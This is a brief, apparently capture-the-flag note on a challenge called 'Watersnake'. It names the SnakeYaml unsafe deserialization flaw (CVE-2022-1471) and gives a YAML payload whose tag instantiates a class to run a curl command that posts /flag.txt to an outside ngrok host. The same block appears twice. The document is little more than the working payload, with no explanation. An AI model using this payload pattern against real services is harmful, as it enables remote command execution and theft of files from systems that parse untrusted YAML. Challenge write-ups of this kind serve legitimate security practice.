Watersnake
Vulnerable package: org.yaml.snakeyaml.Yaml
Unsafe deserialization vulnerability in SnakeYaml (CVE-2022-1471)
Payload:
foo: !!com.lean.watersnake.GetWaterLevel ["curl -d @/flag.txt https://38ec-222-152-214-247.ngrok-free.app"]
Vulnerable package: org.yaml.snakeyaml.Yaml
Unsafe deserialization vulnerability in SnakeYaml (CVE-2022-1471)
Payload:
foo: !!com.lean.watersnake.GetWaterLevel ["curl -d @/flag.txt https://38ec-222-152-214-247.ngrok-free.app"]